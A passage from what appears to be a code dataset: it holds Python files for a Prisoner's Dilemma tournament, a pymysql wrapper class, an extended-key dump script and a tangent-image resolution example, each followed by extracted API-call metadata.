55843), 'numpy.mean', 'np.mean', (['probe_phase'], {'axis': '(0)'}), '(probe_phase, axis=0)\n', (55822, 55843), True, 'import numpy as np\n'), ((3941, 3977), 'numpy.percentile', 'np.percentile', (['self.wd[j]', 'p'], {'axis': '(1)'}), '(self.wd[j], p, axis=1)\n', (3954, 3977), True, 'import numpy as np\n'), ((4726, 4756), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (4740, 4756), True, 'import numpy as np\n'), ((8294, 8335), 'numpy.percentile', 'np.percentile', (['self.log_dec[j]', 'p'], {'axis': '(1)'}), '(self.log_dec[j], p, axis=1)\n', (8307, 8335), True, 'import numpy as np\n'), ((8992, 9022), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (9006, 9022), True, 'import numpy as np\n'), ((31078, 31091), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (31084, 31091), True, 'import numpy as np\n'), ((31129, 31142), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (31135, 31142), True, 'import numpy as np\n'), ((31413, 31426), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (31419, 31426), True, 'import numpy as np\n'), ((31471, 31484), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (31477, 31484), True, 'import numpy as np\n'), ((32124, 32160), 'numpy.percentile', 'np.percentile', (['probe_resp', 'p'], {'axis': '(0)'}), '(probe_resp, p, axis=0)\n', (32137, 32160), True, 'import numpy as np\n'), ((32847, 32877), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (32861, 32877), True, 'import numpy as np\n'), ((39787, 39837), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n]', 'p'], {'axis': '(0)'}), '(self.yout[..., ndof * n], p, axis=0)\n', (39800, 39837), True, 'import numpy as np\n'), ((39865, 39919), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n + 1]', 'p'], {'axis': '(0)'}), '(self.yout[..., ndof * n + 1], p, axis=0)\n', (39878, 39919), True, 'import numpy as np\n'), ((40682, 40741), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n]', '(50 + p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * n], 50 + p / 2, axis=0)\n', (40695, 40741), True, 'import numpy as np\n'), ((40769, 40832), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n + 1]', '(50 + p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * n + 1], 50 + p / 2, axis=0)\n', (40782, 40832), True, 'import numpy as np\n'), ((41619, 41678), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n]', '(50 - p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * n], 50 - p / 2, axis=0)\n', (41632, 41678), True, 'import numpy as np\n'), ((41706, 41769), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n + 1]', '(50 - p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * n + 1], 50 - p / 2, axis=0)\n', (41719, 41769), True, 'import numpy as np\n'), ((45858, 45871), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (45864, 45871), True, 'import numpy as np\n'), ((45909, 45922), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (45915, 45922), True, 'import numpy as np\n'), ((47011, 47047), 'numpy.percentile', 'np.percentile', (['probe_resp', 'p'], {'axis': '(0)'}), '(probe_resp, p, axis=0)\n', (47024, 47047), True, 'import numpy as np\n'), ((47872, 47902), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (47886, 47902), True, 'import numpy as np\n'), ((51169, 51206), 'numpy.percentile', 'np.percentile', (['probe_phase', 'p'], {'axis': '(0)'}), '(probe_phase, p, axis=0)\n', (51182, 51206), True, 'import numpy as np\n'), ((52029, 52059), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (52043, 52059), True, 'import numpy as np\n'), ((54829, 54842), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (54835, 54842), True, 'import numpy as np\n'), ((54880, 54893), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (54886, 54893), True, 'import numpy as np\n'), ((56565, 56601), 'numpy.percentile', 'np.percentile', (['probe_resp', 'p'], {'axis': '(0)'}), '(probe_resp, p, axis=0)\n', (56578, 56601), True, 'import numpy as np\n'), ((56633, 56670), 'numpy.percentile', 'np.percentile', (['probe_phase', 'p'], {'axis': '(0)'}), '(probe_phase, p, axis=0)\n', (56646, 56670), True, 'import numpy as np\n'), ((57760, 57790), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (57774, 57790), True, 'import numpy as np\n'), ((57822, 57852), 'numpy.concatenate', 'np.concatenate', (['(p3, p4[::-1])'], {}), '((p3, p4[::-1]))\n', (57836, 57852), True, 'import numpy as np\n'), ((46196, 46209), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (46202, 46209), True, 'import numpy as np\n'), ((46276, 46289), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (46282, 46289), True, 'import numpy as np\n'), ((55167, 55180), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (55173, 55180), True, 'import numpy as np\n'), ((55247, 55260), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (55253, 55260), True, 'import numpy as np\n')]
ben9583/PrisonersDilemmaTournament
code/prisonersDilemma.py
8227c05f835c93a0b30feb4207a7d7c631e670a0
import os import itertools import importlib import numpy as np import random STRATEGY_FOLDER = "exampleStrats" RESULTS_FILE = "results.txt" pointsArray = [[1,5],[0,3]] # The i-j-th element of this array is how many points you receive if you do play i, and your opponent does play j. moveLabels = ["D","C"] # D = defect, betray, sabotage, free-ride, etc. # C = cooperate, stay silent, comply, upload files, etc. # Returns a 2-by-n numpy array. The first axis is which player (0 = us, 1 = opponent) # The second axis is which turn. (0 = first turn, 1 = next turn, etc. # For example, it might return # # [[0 0 1] a.k.a. D D C # [1 1 1]] a.k.a. C C C # # if there have been 3 turns, and we have defected twice then cooperated once, # and our opponent has cooperated all three times. def getVisibleHistory(history, player, turn): historySoFar = history[:,:turn].copy() if player == 1: historySoFar = np.flip(historySoFar,0) return historySoFar def runRound(pair): moduleA = importlib.import_module(STRATEGY_FOLDER+"."+pair[0]) moduleB = importlib.import_module(STRATEGY_FOLDER+"."+pair[1]) memoryA = None memoryB = None LENGTH_OF_GAME = int(200-40*np.log(random.random())) # The games are a minimum of 50 turns long. The np.log here guarantees that every turn after the 50th has an equal (low) chance of being the final turn. history = np.zeros((2,LENGTH_OF_GAME),dtype=int) for turn in range(LENGTH_OF_GAME): playerAmove, memoryA = moduleA.strategy(getVisibleHistory(history,0,turn),memoryA) playerBmove, memoryB = moduleB.strategy(getVisibleHistory(history,1,turn),memoryB) history[0,turn] = playerAmove history[1,turn] = playerBmove return history def tallyRoundScores(history): scoreA = 0 scoreB = 0 ROUND_LENGTH = history.shape[1] for turn in range(ROUND_LENGTH): playerAmove = history[0,turn] playerBmove = history[1,turn] scoreA += pointsArray[playerAmove][playerBmove] scoreB += pointsArray[playerBmove][playerAmove] return scoreA/ROUND_LENGTH, scoreB/ROUND_LENGTH def outputRoundResults(f, pair, roundHistory, scoresA, scoresB): f.write(pair[0]+" (P1) VS. "+pair[1]+" (P2)\n") for p in range(2): for t in range(roundHistory.shape[1]): move = roundHistory[p,t] f.write(moveLabels[move]+" ") f.write("\n") f.write("Final score for "+pair[0]+": "+str(scoresA)+"\n") f.write("Final score for "+pair[1]+": "+str(scoresB)+"\n") f.write("\n") def pad(stri, leng): result = stri for i in range(len(stri),leng): result = result+" " return result def runFullPairingTournament(inFolder, outFile): print("Starting tournament, reading files from "+inFolder) scoreKeeper = {} STRATEGY_LIST = [] for file in os.listdir(inFolder): if file.endswith(".py"): STRATEGY_LIST.append(file[:-3]) for strategy in STRATEGY_LIST: scoreKeeper[strategy] = 0 f = open(outFile,"w+") for pair in itertools.combinations(STRATEGY_LIST, r=2): roundHistory = runRound(pair) scoresA, scoresB = tallyRoundScores(roundHistory) outputRoundResults(f, pair, roundHistory, scoresA, scoresB) scoreKeeper[pair[0]] += scoresA scoreKeeper[pair[1]] += scoresB scoresNumpy = np.zeros(len(scoreKeeper)) for i in range(len(STRATEGY_LIST)): scoresNumpy[i] = scoreKeeper[STRATEGY_LIST[i]] rankings = np.argsort(scoresNumpy) f.write("\n\nTOTAL SCORES\n") for rank in range(len(STRATEGY_LIST)): i = rankings[-1-rank] score = scoresNumpy[i] scorePer = score/(len(STRATEGY_LIST)-1) f.write("#"+str(rank+1)+": "+pad(STRATEGY_LIST[i]+":",16)+' %.3f'%score+' (%.3f'%scorePer+" average)\n") f.flush() f.close() print("Done with everything! Results file written to "+RESULTS_FILE) runFullPairingTournament(STRATEGY_FOLDER, RESULTS_FILE)
[((1069, 1125), 'importlib.import_module', 'importlib.import_module', (["(STRATEGY_FOLDER + '.' + pair[0])"], {}), "(STRATEGY_FOLDER + '.' + pair[0])\n", (1092, 1125), False, 'import importlib\n'), ((1137, 1193), 'importlib.import_module', 'importlib.import_module', (["(STRATEGY_FOLDER + '.' + pair[1])"], {}), "(STRATEGY_FOLDER + '.' + pair[1])\n", (1160, 1193), False, 'import importlib\n'), ((1462, 1502), 'numpy.zeros', 'np.zeros', (['(2, LENGTH_OF_GAME)'], {'dtype': 'int'}), '((2, LENGTH_OF_GAME), dtype=int)\n', (1470, 1502), True, 'import numpy as np\n'), ((2994, 3014), 'os.listdir', 'os.listdir', (['inFolder'], {}), '(inFolder)\n', (3004, 3014), False, 'import os\n'), ((3249, 3291), 'itertools.combinations', 'itertools.combinations', (['STRATEGY_LIST'], {'r': '(2)'}), '(STRATEGY_LIST, r=2)\n', (3271, 3291), False, 'import itertools\n'), ((3711, 3734), 'numpy.argsort', 'np.argsort', (['scoresNumpy'], {}), '(scoresNumpy)\n', (3721, 3734), True, 'import numpy as np\n'), ((982, 1006), 'numpy.flip', 'np.flip', (['historySoFar', '(0)'], {}), '(historySoFar, 0)\n', (989, 1006), True, 'import numpy as np\n'), ((1276, 1291), 'random.random', 'random.random', ([], {}), '()\n', (1289, 1291), False, 'import random\n')]
paepcke/json_to_relation
json_to_relation/mysqldb.py
acfa58d540f8f51d1d913d0c173ee3ded1b6c2a9
# Copyright (c) 2014, Stanford University # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. # 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' Created on Sep 24, 2013 @author: paepcke Modifications: - Dec 30, 2013: Added closing of connection to close() method ''' import re import subprocess import tempfile import pymysql #import MySQLdb class MySQLDB(object): ''' Shallow interface to MySQL databases. Some niceties nonetheless. The query() method is an iterator. So:: for result in mySqlObj.query('SELECT * FROM foo'): print result ''' def __init__(self, host='127.0.0.1', port=3306, user='root', passwd='', db='mysql'): ''' :param host: MySQL host :type host: string :param port: MySQL host's port :type port: int :param user: user to log in as :type user: string :param passwd: password to use for given user :type passwd: string :param db: database to connect to within server :type db: string ''' # If all arguments are set to None, we are unittesting: if all(arg is None for arg in (host,port,user,passwd,db)): return self.user = user self.pwd = passwd self.db = db self.cursors = [] try: self.connection = pymysql.connect(host=host, port=port, user=user, passwd=passwd, db=db) #self.connection = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd, db=db, local_infile=1) #except MySQLdb.OperationalError: except pymysql.OperationalError: pwd = '...............' if len(passwd) > 0 else '<no password>' raise ValueError('Cannot reach MySQL server with host:%s, port:%s, user:%s, pwd:%s, db:%s' % (host, port, user, pwd, db)) def close(self): ''' Close all cursors that are currently still open. ''' for cursor in self.cursors: try: cursor.close() except: pass try: self.connection.close() except: pass def createTable(self, tableName, schema): ''' Create new table, given its name, and schema. The schema is a dict mappingt column names to column types. Example: {'col1' : 'INT', 'col2' : 'TEXT'} :param tableName: name of new table :type tableName: String :param schema: dictionary mapping column names to column types :type schema: Dict<String,String> ''' colSpec = '' for colName, colVal in schema.items(): colSpec += str(colName) + ' ' + str(colVal) + ',' cmd = 'CREATE TABLE IF NOT EXISTS %s (%s) ' % (tableName, colSpec[:-1]) cursor = self.connection.cursor() try: cursor.execute(cmd) self.connection.commit() finally: cursor.close() def dropTable(self, tableName): ''' Delete table safely. No errors :param tableName: name of table :type tableName: String ''' cursor = self.connection.cursor() try: cursor.execute('DROP TABLE IF EXISTS %s' % tableName) self.connection.commit() finally: cursor.close() def truncateTable(self, tableName): ''' Delete all table rows. No errors :param tableName: name of table :type tableName: String ''' cursor = self.connection.cursor() try: cursor.execute('TRUNCATE TABLE %s' % tableName) self.connection.commit() finally: cursor.close() def insert(self, tblName, colnameValueDict): ''' Given a dictionary mapping column names to column values, insert the data into a specified table :param tblName: name of table to insert into :type tblName: String :param colnameValueDict: mapping of column name to column value :type colnameValueDict: Dict<String,Any> ''' colNames, colValues = zip(*colnameValueDict.items()) cursor = self.connection.cursor() try: cmd = 'INSERT INTO %s (%s) VALUES (%s)' % (str(tblName), ','.join(colNames), self.ensureSQLTyping(colValues)) cursor.execute(cmd) self.connection.commit() finally: cursor.close() def bulkInsert(self, tblName, colNameTuple, valueTupleArray): ''' Inserts large number of rows into given table. Strategy: write the values to a temp file, then generate a LOAD INFILE LOCAL MySQL command. Execute that command via subprocess.call(). Using a cursor.execute() fails with error 'LOAD DATA LOCAL is not supported in this MySQL version...' even though MySQL is set up to allow the op (load-infile=1 for both mysql and mysqld in my.cnf). :param tblName: table into which to insert :type tblName: string :param colNameTuple: tuple containing column names in proper order, i.e. \ corresponding to valueTupleArray orders. :type colNameTuple: (str[,str[...]]) :param valueTupleArray: array of n-tuples, which hold the values. Order of\ values must corresond to order of column names in colNameTuple. :type valueTupleArray: [(<anyMySQLCompatibleTypes>[<anyMySQLCompatibleTypes,...]]) ''' tmpCSVFile = tempfile.NamedTemporaryFile(dir='/tmp',prefix='userCountryTmp',suffix='.csv') for valueTuple in valueTupleArray: tmpCSVFile.write(','.join(valueTuple) + '\n') try: # Remove quotes from the values inside the colNameTuple's: mySQLColNameList = re.sub("'","",str(colNameTuple)) mySQLCmd = "USE %s; LOAD DATA LOCAL INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\"' LINES TERMINATED BY '\\n' %s" %\ (self.db, tmpCSVFile.name, tblName, mySQLColNameList) subprocess.call(['mysql', '-u', self.user, '-p%s'%self.pwd, '-e', mySQLCmd]) finally: tmpCSVFile.close() def update(self, tblName, colName, newVal, fromCondition=None): ''' Update one column with a new value. :param tblName: name of table in which update is to occur :type tblName: String :param colName: column whose value is to be changed :type colName: String :param newVal: value acceptable to MySQL for the given column :type newVal: type acceptable to MySQL for the given column :param fromCondition: optionally condition that selects which rows to update.\ if None, the named column in all rows are updated to\ the given value. Syntax must conform to what may be in\ a MySQL FROM clause (don't include the 'FROM' keyword) :type fromCondition: String ''' cursor = self.connection.cursor() try: if fromCondition is None: cmd = "UPDATE %s SET %s = '%s';" % (tblName,colName,newVal) else: cmd = "UPDATE %s SET %s = '%s' WHERE %s;" % (tblName,colName,newVal,fromCondition) cursor.execute(cmd) self.connection.commit() finally: cursor.close() def ensureSQLTyping(self, colVals): ''' Given a list of items, return a string that preserves MySQL typing. Example: (10, 'My Poem') ---> '10, "My Poem"' Note that ','.join(map(str,myList)) won't work: (10, 'My Poem') ---> '10, My Poem' :param colVals: list of column values destined for a MySQL table :type colVals: <any> ''' resList = [] for el in colVals: if isinstance(el, basestring): resList.append('"%s"' % el) else: resList.append(el) return ','.join(map(str,resList)) def query(self, queryStr): ''' Query iterator. Given a query, return one result for each subsequent call. :param queryStr: query :type queryStr: String ''' cursor = self.connection.cursor() # For if caller never exhausts the results by repeated calls: self.cursors.append(cursor) cursor.execute(queryStr) while True: nextRes = cursor.fetchone() if nextRes is None: cursor.close() return yield nextRes
[((6940, 7019), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'dir': '"""/tmp"""', 'prefix': '"""userCountryTmp"""', 'suffix': '""".csv"""'}), "(dir='/tmp', prefix='userCountryTmp', suffix='.csv')\n", (6967, 7019), False, 'import tempfile\n'), ((2736, 2806), 'pymysql.connect', 'pymysql.connect', ([], {'host': 'host', 'port': 'port', 'user': 'user', 'passwd': 'passwd', 'db': 'db'}), '(host=host, port=port, user=user, passwd=passwd, db=db)\n', (2751, 2806), False, 'import pymysql\n'), ((7515, 7593), 'subprocess.call', 'subprocess.call', (["['mysql', '-u', self.user, '-p%s' % self.pwd, '-e', mySQLCmd]"], {}), "(['mysql', '-u', self.user, '-p%s' % self.pwd, '-e', mySQLCmd])\n", (7530, 7593), False, 'import subprocess\n')]
treys/crypto-key-derivation
tools/xkeydump.py
789900bd73160db9a0d406c7c7f00f5f299aff73
#!./venv/bin/python from lib.mbp32 import XKey from lib.utils import one_line_from_stdin xkey = XKey.from_xkey(one_line_from_stdin()) print(xkey) print("Version:", xkey.version) print("Depth:", xkey.depth) print("Parent FP:", xkey.parent_fp.hex()) print("Child number:", xkey.child_number_with_tick()) print("Chain code:", xkey.chain_code.hex()) print("Key:", xkey.key) if xkey.key.get_private_bytes(): print("Private bytes:", xkey.key.get_private_bytes().hex()) print("Public bytes:", xkey.key.get_public_bytes().hex()) print("Key ID:", xkey.keyid().hex()) print("XKey:", xkey.to_xkey().decode('ascii'))
[((113, 134), 'lib.utils.one_line_from_stdin', 'one_line_from_stdin', ([], {}), '()\n', (132, 134), False, 'from lib.utils import one_line_from_stdin\n')]
meder411/Tangent-Images
examples/compute_angular_resolution.py
6def4d7b8797110e54f7faa2435973771d9e9722
from spherical_distortion.util import * sample_order = 9 # Input resolution to examine def ang_fov(s): print('Spherical Resolution:', s) for b in range(s): dim = tangent_image_dim(b, s) # Pixel dimension of tangent image corners = tangent_image_corners(b, s) # Corners of each tangent image fov_x, fov_y = compute_tangent_image_angular_resolution(corners) print(' At base level', b) print(' FOV (x) =', fov_x) print(' FOV (y) =', fov_y) print(' deg/pix (x) =', fov_x/dim) print(' deg/pix (y) =', fov_y/dim) ang_fov(sample_order)
[]